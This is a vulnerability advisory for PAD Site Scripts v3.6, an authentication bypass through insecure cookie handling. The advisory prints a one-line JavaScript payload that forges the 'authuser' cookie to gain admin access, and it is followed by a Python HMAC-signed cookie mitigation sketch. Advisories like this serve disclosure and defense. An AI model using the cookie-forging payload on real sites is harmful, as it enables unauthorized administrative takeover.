Vendor: PAD Site Scripts
By: Mr.tro0oqy
CVSS: 7.5 (HIGH)
Insecure Cookie Handling
CWE: 264
Product Name: PAD Site Scripts
Affected Version From: 3.6
Affected Version To: 3.6
Patch Exists: NO
Related CWE: N/A
CPE: a:pad_site_scripts:pad_site_scripts:3.6
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009
PAD Site Scripts v3.6 Insecure Cookie Handling Vulnerability
A vulnerability in PAD Site Scripts v3.6 allows an attacker to gain access to the admin panel by setting the authuser cookie to the username of the admin account. The cookie can be set from the browser with JavaScript such as 'javascript:document.cookie="authuser=[demo];path=/"', where the value is a guess at the admin account's username. Once the username is guessed, the same JavaScript is used again to set the authuser cookie to that username, and the admin panel URL is then opened.
Mitigation:
Ensure that the authuser cookie is set securely and is not vulnerable to manipulation.
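One way to make the authuser cookie resistant to manipulation, shown as an added example in Python rather than code from PAD Site Scripts: the server issues the cookie only after a real login and binds the username to an HMAC tag and an issue time, so a value typed in by the client fails verification. The function names, SERVER_KEY and MAX_AGE are assumptions made for this sketch.

```python
import base64
import hashlib
import hmac
import time

# Constructed demo key; a real deployment loads a random secret from server-side config.
SERVER_KEY = b"constructed-demo-key-not-for-production"
MAX_AGE = 3600  # assumed lifetime of a cookie, in seconds


def _b64(data):
    return base64.urlsafe_b64encode(data).decode().rstrip("=")


def _sign(payload, key):
    # HMAC-SHA256 over "<username_b64>.<issued>"; only the server knows the key.
    return _b64(hmac.new(key, payload.encode(), hashlib.sha256).digest())


def issue_authuser(username, key=SERVER_KEY, now=None):
    """Build the cookie value; call this only after the password check succeeds."""
    issued = int(time.time() if now is None else now)
    payload = "%s.%d" % (_b64(username.encode()), issued)
    return "%s.%s" % (payload, _sign(payload, key))


def verify_authuser(cookie, key=SERVER_KEY, now=None):
    """Return the authenticated username, or None if the cookie is not trustworthy."""
    parts = cookie.split(".")
    if len(parts) != 3:
        return None  # a bare username such as "admin" is rejected here
    user_b64, issued, tag = parts
    expected = _sign("%s.%s" % (user_b64, issued), key)
    # Constant-time comparison; any change to the username or time breaks the tag.
    if not hmac.compare_digest(tag.encode(), expected.encode()):
        return None
    current = time.time() if now is None else now
    if current - int(issued) > MAX_AGE:
        return None  # expired cookies are refused even with a valid tag
    padded = user_b64 + "=" * (-len(user_b64) % 4)
    return base64.urlsafe_b64decode(padded).decode()
```

A random server-side session identifier that maps to the user record is an equally valid design; in both cases the cookie should also be sent with the HttpOnly and Secure attributes.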